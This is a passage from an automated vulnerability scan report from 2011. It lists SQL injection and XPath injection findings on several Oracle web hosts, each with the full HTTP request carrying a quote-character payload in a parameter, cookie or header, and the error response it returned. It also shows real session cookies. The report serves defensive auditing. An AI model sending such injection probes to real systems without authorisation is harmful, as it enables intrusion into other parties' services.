s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
8E65D95BA&p_arg_names=252649917580681530&p_t27=&p_arg_names=207920229995643446&p_t28=N&p_arg_names=207924523705887677&p_t29=&p_arg_names=207924703404891203&p_t30=&p_arg_names=207924928123907820&p_t31='&p_arg_names=207925107822911411&p_t32=&p_arg_names=207925329293917635&p_t33=1&p_arg_names=207925530116927342&p_t34=&p_arg_names=218324920070793075&p_t35=&p_arg_names=218325130112796005&p_t36=&p_arg_na
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:57:37 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13367
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.35. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t32 parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://shop.oracle.com
Path:   /pls/ostore/wwv_flow.accept

Issue detail

The p_t32 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t32 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /pls/ostore/wwv_flow.accept HTTP/1.1
Host: shop.oracle.com
Connection: keep-alive
Content-Length: 2379
Cache-Control: max-age=0
Origin: https://shop.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://shop.oracle.com/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_700=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B

p_flow_id=700&p_flow_step_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=
...[SNIP]...
30&p_t27=&p_arg_names=207920229995643446&p_t28=N&p_arg_names=207924523705887677&p_t29=&p_arg_names=207924703404891203&p_t30=&p_arg_names=207924928123907820&p_t31=&p_arg_names=207925107822911411&p_t32='&p_arg_names=207925329293917635&p_t33=1&p_arg_names=207925530116927342&p_t34=&p_arg_names=218324920070793075&p_t35=&p_arg_names=218325130112796005&p_t36=&p_arg_names=218326006610817582&p_t37=&p_md5_ch
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:57:42 GMT
Server: Oracle-Application-Server-10g
Vary: Host
Content-Length: 13367
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Product Details - Oracle Cryst
...[SNIP]...
<div class="ErrorPageMessage">ORA-06502: PL/SQL: numeric or value error: character to number conversion error</div>
...[SNIP]...

1.36. http://solutions.oracle.com/portal/page/portal/searchresults [mo parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/searchresults

Issue detail

The mo parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the mo parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /portal/page/portal/searchresults HTTP/1.1
Host: solutions.oracle.com
Proxy-Connection: keep-alive
Content-Length: 165
Cache-Control: max-age=0
Origin: http://solutions.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://solutions.oracle.com/home/basic_search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; portal=9.0.3+en-us+us+AMERICA+AF7E580109CB55C9E040578C51E13693+71B76364A799F1AE086BA84B020F2F3EBEEA355AC1C17754D73BC16CF6BBABBBEE0A9FA755DEF0C1E3A96613591765978399FACD6BDB5ECC45AE34718F31EDF6BA33CF3842A305D5B404D9685E436F73EEF25F27CBC8D9EF; BIGipServersolcat_pool=1292735117.25118.0000; s_cc=true; gpv_p24=http%3A//solutions.oracle.com/home/basic_search; gpw_e24=http%3A//solutions.oracle.com/home/basic_search; s_sq=%5B%5BB%5D%5D

osf=&ms=xss+sqli+httpi+search+faq+contact&mo=containsany'&sepg=57&fi=1&fs=57&pu=1&has=&as=2065%2C0&pao=equal&pav=&pan=sc_membership_location&pas=0&p_action=SUBMIT&ll=

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TM;max-age=2592000+0;age=0;ecid=96377044523,1)
Content-Length: 50539
Date: Mon, 17 Oct 2011 12:36:15 GMT
Content-Location: /servlet/page/searchresults

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...
<!-- wwsbr_search_query.process_text_match_operator -->Unexpected error - ORA-0000: normal, successful completion<span style="white-space:nowrap;">
...[SNIP]...

2. XPath injection  previous  next
There are 17 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [GSI cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The GSI cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the GSI cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C'; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=31;ecid=49937809976033327,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.2. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [ORA_MOS_LOCALE cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The ORA_MOS_LOCALE cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the ORA_MOS_LOCALE cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en'; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=103;ecid=49714871108595606,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=41;ecid=49938677559437373,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.4. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1'
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=116;ecid=49716026454811337,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.5. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpv_p24 cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The gpv_p24 cookie appears to be vulnerable to XPath injection attacks. The payload %2527 was submitted in the gpv_p24 cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..%2527; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=34;ecid=49938071969041314,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.6. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpw_e24 cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
